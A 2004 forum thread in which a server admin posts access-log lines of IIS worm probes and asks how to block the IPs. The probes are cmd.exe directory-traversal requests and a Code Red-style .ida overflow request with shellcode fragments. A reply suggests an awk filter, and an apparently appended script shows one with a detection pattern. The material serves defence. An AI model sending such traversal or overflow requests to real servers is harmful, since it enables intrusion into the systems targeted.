·
Registered
Joined
·
146 Posts
Discussion Starter #1
Well I guess this is a question, I was just looking through my error_log on my server & I came up with a bunch of errors like these found below. Is there an easy way to just auto blacklist these IPs once they do something stupid like below? FYI: this isn't a win box so these script kiddie attacks just take up log space.

64.246.165.160 - - [16/Aug/2004:02:27:31 +0000] "GET / HTTP/1.1" 206 1533
69.142.187.141 - - [16/Aug/2004:09:38:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 323
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 321
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
69.142.187.141 - - [16/Aug/2004:09:38:51 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 378
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344
69.142.187.141 - - [16/Aug/2004:09:38:52 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 335
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 335
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.142.187.141 - - [16/Aug/2004:09:38:53 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
69.81.41.62 - - [16/Aug/2004:14:25:31 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 331
 

·
Registered
Joined
·
288 Posts
If it's log space you're worried about, maybe try writing an awk script to filter out anything containing certain keywords (*.exe, *.ida, other exploits...) and then throw it in cron depending on how many exploit attempts you get hit with...
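
The awk filter suggested in the reply above could look like the following; this is an added example, not code posted in the thread. The pattern list, the function names and the sample log lines (documentation-range addresses) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example. In common log format, field 1 is the client IP and
# field 7 is the request path, so the match is limited to the path.
PROBE_RE='(cmd|root)[.]exe|[.]ida([?]|$)'   # assumed keyword list; extend as needed

# suspect_ips MIN < access_log : print IPs with at least MIN probe requests
suspect_ips() {
    awk -v re="$PROBE_RE" -v min="${1:-1}" '
        tolower($7) ~ re { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= min) print ip }
    ' | sort
}

# strip_probes < access_log : print the log with the probe lines removed
strip_probes() {
    awk -v re="$PROBE_RE" 'tolower($7) !~ re'
}

# Constructed sample log (not the addresses from the thread)
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [16/Aug/2004:02:27:31 +0000] "GET / HTTP/1.1" 200 1533
198.51.100.7 - - [16/Aug/2004:09:38:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 323
198.51.100.7 - - [16/Aug/2004:09:38:51 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
203.0.113.5 - - [16/Aug/2004:14:25:31 +0000] "GET /default.ida?XXXX HTTP/1.0" 404 331
192.0.2.10 - - [16/Aug/2004:15:00:00 +0000] "GET /docs/idaho.html HTTP/1.1" 200 900
EOF
}

sample_log | suspect_ips 1      # candidate addresses for a deny list
sample_log | strip_probes       # what remains in the trimmed log
```

Raising the `suspect_ips` threshold above 1 keeps a single stray request from putting an address on the list; what consumes the list (firewall rule, web-server deny directive) depends on the server setup.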
 